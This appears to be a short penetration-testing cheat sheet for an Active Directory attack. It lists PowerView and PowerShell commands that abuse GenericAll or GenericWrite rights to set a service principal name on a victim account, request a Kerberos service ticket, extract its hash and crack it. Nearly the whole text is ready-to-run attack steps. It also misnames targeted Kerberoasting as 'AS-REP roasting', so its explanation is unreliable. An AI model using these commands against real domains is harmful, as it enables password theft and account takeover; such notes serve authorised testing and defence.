TARGETED AS-REP ROASTING
Targeted AS-REP roasting is also known as Set-SPN attack
Checking "GenericAll" or "GenericWrite" permission on ACL to modify the SPN
Attacker should be a part of any AD object same as Victim
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<OBJECT>"}
Enumerating whether the Victim has SPN
Get-DomainUser -Identity <USERNAME> | Select ServicePrincipalName
Forcefully setting SPN for the Victim
Set-DomainObject -Identity <USERNAME> -Set @{serviceprincipalname='DOMAIN/WHATEVER'} -Verbose
Verifying once, whether SPN is set or not
Requesting a new TGS for the SPN we set manually
Requesting a new TGS to the service from an user account
Request-SPNTicket -SPN <SPN FQDN>
Get-DomainUser -Identity <USERNAME> | Get-DomainSPNTicket | Select -ExpandProperty Hash
Add-Type -AssemblyNAme System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <SPN FQDN>
Verifying tickets using klist
CRACK
Last updated